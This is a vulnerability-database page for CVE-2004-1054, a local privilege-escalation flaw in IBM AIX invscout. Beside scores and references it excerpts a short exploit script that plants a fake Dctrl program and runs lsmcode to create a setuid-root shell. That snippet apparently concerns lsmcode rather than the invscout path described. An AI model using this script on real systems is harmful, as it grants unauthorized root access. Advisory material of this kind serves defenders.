Published: 10/01/2005 Updated: 11/07/2017

CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9

VMScore: 730

Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Untrusted execution path vulnerability in invscout in IBM AIX 5.1.0, 5.2.0, and 5.3.0 allows local users to gain privileges by modifying the PATH environment variable to point to a malicious "uname" program, which is executed from lsvpd after lsvpd has been invoked by invscout.

Vulnerable Product	Search on Vulmon	Subscribe to Product
ibm aix 5.1
ibm aix 5.3_l
ibm aix 5.1l
ibm aix 5.2
ibm aix 5.2.2
ibm aix 5.2_l
ibm aix 5.3

#!/usr/bin/sh # r00t exploit written for the invscout bug reported by Idefense labs # wwwidefensecom/application/poi/display?id=171&type=vulnerabilities # coded by ri0t exploitation is trivial but automated with this script # wwwri0tnetnet # # usage /getr00tsh :) # exploitation gives euid(root) from here getting guid (root) is as s ...

mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat > /tmp/aap/bin/Dctrl << EOF #!/bin/sh cp /bin/sh /tmp/shh chown root:system /tmp/shh chmod u+s /tmp/shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/shh # milw0rmcom [2004-12-21] ...

NVD-CWE-Other http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities http://www-1.ibm.com/support/search.wss?rs=0&q=IY64852&apar=only http://www-1.ibm.com/support/search.wss?rs=0&q=IY64976&apar=only http://www-1.ibm.com/support/search.wss?rs=0&q=IY64820&apar=only https://exchange.xforce.ibmcloud.com/vulnerabilities/18619 https://nvd.nist.gov https://www.exploit-db.com/exploits/898/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2004-1054

Vulnerability Summary

Vulnerability Trend

Exploits

References

Vulmon Search

About

Products

Connect